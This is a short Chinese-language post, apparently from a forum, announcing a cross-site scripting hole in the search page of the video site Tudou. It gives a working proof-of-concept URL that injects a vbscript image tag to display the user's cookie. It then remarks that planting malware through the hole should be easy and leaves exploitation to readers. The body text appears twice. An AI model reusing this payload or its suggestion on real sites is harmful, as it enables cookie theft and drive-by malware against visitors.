土豆网跨站漏洞
昨天无聊去土豆网看视频 很无意的在搜索栏中输入一段跨站代码
没想到成功运行了 然后就专门的测试了一下发现管理员忽略了过滤vbscript 下边给出漏洞地址和测试代码
http://so.tudou.com/isearch/<img src="vbscript:msgbox(document.cookie)" />
利用这个漏洞挂马应该很简单 怎么利用此漏洞就看个人发挥了
昨天无聊去土豆网看视频 很无意的在搜索栏中输入一段跨站代码
没想到成功运行了 然后就专门的测试了一下发现管理员忽略了过滤vbscript 下边给出漏洞地址和测试代码
http://so.tudou.com/isearch/<img src="vbscript:msgbox(document.cookie)" />
利用这个漏洞挂马应该很简单 怎么利用此漏洞就看个人发挥了